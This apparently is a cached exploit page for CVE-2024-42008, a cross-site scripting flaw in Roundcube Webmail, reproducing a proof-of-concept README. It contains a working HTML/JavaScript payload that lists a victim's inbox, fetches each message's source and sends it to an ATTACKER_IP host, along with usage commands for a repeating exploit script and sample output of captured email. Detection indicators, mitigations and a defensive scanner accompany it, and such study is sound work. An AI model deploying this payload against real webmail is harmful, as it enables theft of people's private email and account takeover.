POC details: 92b54095ef59803fafcfba6275d9bb23a02b277c

Source
Associated vulnerability
Title: Roundcube Webmail security vulnerability (CVE-2024-42008)
Description: Roundcube Webmail is a browser-based open-source IMAP client that supports address book management, message search, spell checking and more. Roundcube Webmail versions 1.5.7 and earlier, and 1.6.x versions before 1.6.8, contain a security vulnerability: a cross-site scripting flaw through which a remote attacker can steal and send the victim's email via a malicious email attachment with a dangerous Content-Type header.
Introduction
# CVE-2024-42008 RoundCube XSS Exploit

## Overview

This repository contains a proof-of-concept exploit for **CVE-2024-42008**, a Cross-Site Scripting (XSS) vulnerability in the RoundCube webmail application. This exploit is designed for educational purposes and controlled penetration testing environments like HackTheBox.

## Vulnerability Details

### CVE-2024-42008 Summary
- **CVE ID**: CVE-2024-42008
- **Type**: Cross-Site Scripting (XSS)
- **CVSS Score**: High
- **Affected Versions**: 
  - RoundCube ≤ 1.5.7
  - RoundCube 1.6.x ≤ 1.6.7
- **Fixed Versions**: 1.5.8, 1.6.8+

### Technical Details

The vulnerability exists in `rcmail_action_mail_get->run()` and allows remote attackers to execute arbitrary JavaScript in victims' browsers. The flaw stems from insufficient input validation when processing email content, particularly in handling CSS animations and JavaScript execution contexts.

**Key Attack Vector:**
- Malicious HTML content injected via contact forms or email messages
- CSS animation properties used to trigger JavaScript execution
- `onanimationstart` event handlers bypass content filters
- JavaScript payload executes in the context of the webmail application

### Impact

Successful exploitation allows attackers to:
- **Steal victim's emails** from INBOX and other folders
- **Exfiltrate email metadata** (UIDs, message lists)
- **Access email source code** and attachments
- **Send emails** from victim's account
- **Harvest login credentials** and session tokens
- **Perform actions** on behalf of the victim

## Exploit Script Analysis

### Script Architecture

The exploit consists of three main components:

1. **XSS Payload Delivery**: Sends malicious HTML via contact form
2. **HTTP Server**: Listens for exfiltrated data
3. **Data Processing**: Captures and logs stolen emails

### Payload Breakdown

```html
<!-- The core XSS payload uses CSS animations to trigger JavaScript -->
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=
  // 1. Fetch email list from victim's INBOX
  fetch('/?_task=mail&_action=list&_mbox=INBOX&_page=&_remote=1')
  .then(r=>r.text())
  .then(t=>{
    // 2. Extract email UIDs using regex
    [...t.matchAll(/this\\.add_message_row\\((\\d+),/g)].forEach(m=>{
      // 3. For each email, fetch full source
      fetch(`/?_task=mail&_uid=${m[1]}&_mbox=INBOX&_action=viewsource`)
      .then(r=>r.text())
      .then(data=>{
        // 4. Exfiltrate email data to attacker server
        fetch(`http://ATTACKER_IP:PORT/?data=${encodeURIComponent(data)}`)
      })
    })
  })
; foo=bar">
```

### Key Features

- **Continuous Operation**: Can send payloads at regular intervals
- **Stealth Mode**: Minimal footprint and error handling
- **Data Logging**: Automatic capture and storage of exfiltrated emails
- **Debug Mode**: Proxy support for traffic analysis
- **Configurable**: Multiple command-line options

## Usage

### Prerequisites
```bash
pip install requests
```

### Basic Usage
```bash
# Single payload delivery
python cve-2024-42008-exploit.py

# Continuous mode (every 30 seconds)
python cve-2024-42008-exploit.py -c

# Custom interval (every 60 seconds)
python cve-2024-42008-exploit.py -c -i 60

# Debug mode with proxy
python cve-2024-42008-exploit.py -d
```

### Configuration

Edit the script to configure:
- `ATTACKER_IP`: Your listening server IP
- `ATTACKER_PORT`: Port for receiving exfiltrated data
- `RECIPIENT_EMAIL`: Target email address
- `TARGET_URL`: Vulnerable RoundCube instance
- `PROXY`: Proxy server for debugging (Burp Suite/Caido)

### Command Line Options

| Option | Description |
|--------|-------------|
| `-d, --debug` | Enable debug mode with proxy support |
| `-c, --continuous` | Send payloads continuously |
| `-i, --interval` | Interval between payloads (default: 30s) |

## Attack Flow

1. **Payload Injection**: Script sends malicious HTML via contact form
2. **Email Delivery**: Vulnerable RoundCube processes and delivers email
3. **Victim Interaction**: User opens/views the malicious email
4. **XSS Execution**: CSS animation triggers JavaScript payload
5. **Data Exfiltration**: JavaScript steals emails and sends to attacker
6. **Data Capture**: Exploit server receives and logs stolen data

## Detection and Mitigation

### For Defenders

**Detection Indicators:**
- Unusual CSS animation properties in email content
- `onanimationstart` event handlers in HTML
- Suspicious JavaScript in email messages
- Outbound requests to unknown domains from webmail
- Repeated contact form submissions

**Mitigation Strategies:**
- Update RoundCube to version 1.5.8 or 1.6.8+
- Implement Content Security Policy (CSP)
- Enable email content filtering
- Monitor for suspicious outbound traffic
- Regular security audits of webmail configurations
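A defender-side check for the indicators listed above, added here as an example and not code from the PoC repository: it parses an HTML message body for `on*` handler attributes, CSS animation declarations and attribute values that smuggle further attribute syntax, and tests a Roundcube version string against the affected ranges this README states. The sample body and the `run()` handler name are constructed.

```python
import re
from html.parser import HTMLParser

# Added example, not code from the PoC repository: flags the indicators this README
# lists (on* handlers, CSS animation properties, attribute values that embed further
# attribute syntax) and checks a Roundcube version against the stated affected ranges.

HANDLER_ATTR = re.compile(r"^on[a-z]+$", re.I)
ANIMATION_CSS = re.compile(r"\banimation(?:-name)?\s*:", re.I)
SMUGGLED_ATTR = re.compile(r"\b(on[a-z]+|style)\s*=", re.I)


class IndicatorScanner(HTMLParser):
    """Collect attribute-level findings while parsing a message body."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag: str, attrs: list) -> None:
        for name, value in attrs:
            value = value or ""
            if HANDLER_ATTR.match(name):
                self.findings.append(f"<{tag}> carries event handler {name}")
            if name == "style" and ANIMATION_CSS.search(value):
                self.findings.append(f"<{tag}> style declares a CSS animation")
            # A value that itself contains 'style=' or 'onX=' has the shape of a
            # sanitizer-confusion payload: a browser may re-tokenise it as attributes.
            for m in SMUGGLED_ATTR.finditer(value):
                self.findings.append(f"<{tag}> attribute {name} embeds '{m.group(1)}='")


def scan_html(body: str) -> list[str]:
    """Return human-readable findings for one HTML body (empty list = clean)."""
    scanner = IndicatorScanner()
    scanner.feed(body)
    scanner.close()
    return scanner.findings


def is_affected(version: str) -> bool:
    """Affected per the README: Roundcube <= 1.5.7, or 1.6.x with x <= 7."""
    v = tuple(int(p) for p in version.split("."))
    return v <= (1, 6, 7) if v[:2] == (1, 6) else v <= (1, 5, 7)


# Constructed sample body in the shape the README describes (not a real capture).
SAMPLE_BODY = ('<body name="bar style=animation-name:progress-bar-stripes '
               'onanimationstart=run() foo=bar"><div style="animation-name:spin" '
               'onanimationstart="run()">hi</div></body>')

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_BODY):
        print("[!]", finding)
    print("1.6.7 affected:", is_affected("1.6.7"), "| 1.6.8 affected:", is_affected("1.6.8"))
```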

### For Penetration Testers

**Testing Considerations:**
- Ensure proper authorization before testing
- Document all activities for reporting
- Test in isolated environments only
- Verify target is intentionally vulnerable
- Follow responsible disclosure practices

## Legal and Ethical Considerations

⚠️ **WARNING**: This exploit is provided for educational and authorized testing purposes only.

- Only use on systems you own or have explicit permission to test
- Designed for HackTheBox and similar learning platforms
- Unauthorized use may violate local and international laws
- Always follow responsible disclosure practices
- Respect privacy and data protection regulations

## Technical References

- [CVE-2024-42008 Official Entry](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42008)
- [RoundCube Security Advisory](https://roundcube.net/news/2024/08/04/security-updates-1.6.8-and-1.5.8)
- [CWE-79: Cross-site Scripting](https://cwe.mitre.org/data/definitions/79.html)

## Output Example

```
[+] Listening on 10.10.14.209:8001 for exfiltrated data...
[2024-07-09 10:30:15] POST Request Sent! Status Code: 200

[+] 📩 Captured Email Data:
Return-Path: <admin@example.com>
Received: from localhost (localhost [127.0.0.1])
...
[Email content]
--------------------------------------------------
[+] 🔥 Email data saved to emails.log
```

## Disclaimer

This code is provided for educational purposes and authorized penetration testing only. The authors are not responsible for any misuse or damage caused by this software. Always ensure you have proper authorization before testing any system.
File snapshot

```
[4.0K] /data/pocs/92b54095ef59803fafcfba6275d9bb23a02b277c
├── [6.3K] README.md
└── [4.4K] script.py

0 directories, 2 files
```

The Shenlong bot has cached this for you.
Notes
    1. It is recommended to access the POC via the source first.
    2. If the source has expired or cannot be accessed, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.